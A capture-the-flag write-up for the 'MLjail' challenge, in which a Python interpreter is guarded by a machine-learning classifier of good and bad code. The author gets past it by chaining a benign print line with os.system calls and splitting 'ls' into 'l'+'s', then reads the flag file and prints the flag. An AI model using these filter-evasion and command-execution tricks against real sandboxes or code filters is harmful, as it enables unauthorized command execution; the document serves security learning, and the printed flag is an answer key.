Rating:
This program is essentially just a python code interpreter. But based on the description, there's a filter that classifies the intention of the code to good_code and bad_code. The model is trained using bad_code.txt and good_code.txt, and its contents are very straight forward.
So let's just try some code
>>> __import__('os')
Bad Code Detected...
Well that makes sense, since thebad_code.txt contains code very similar to that.
Okay what if we use a line of code from good_code.txt and chain it with an attacking code
>>> print('Hello, world!'); __import__('os')
Hello, world!
Okay so that works! let's try calling system('ls') from os so that we could see files that are in the current directory.
>>> print('Hello, world!'); __import__('os').system('ls')
Bad Code Detected...
Well that is detected.
What if we try obfuscating ls to l + s since they will get tokenized differently but essentially stay the same once evaluated.
>>> print('Hello, world!'); __import__('os').system('l' + 's')
Dockerfile
MLjail
ReadME.md
docker-compose.yml
entrypoint.sh
Hello, world!
There we go, it seems like it has the same file structure as the zip file provided to us. That means the flag should just be in MLjail/flag.txt. Now let's try using the same method above but calling cat instead.
>>> print('Hello, world!'); __import__('os').system('cat MLjail/flag.txt')
PCTF{M@chin3_1earning_d0_be_tR@nsformati0na1_1818726356}Hello, world!
I was surprised that it worked immediately, I guess that makes sense since cat was not defined in the bad_code.txt. But there it is, the flag is:
PCTF{M@chin3_1earning_d0_be_tR@nsformati0na1_1818726356}
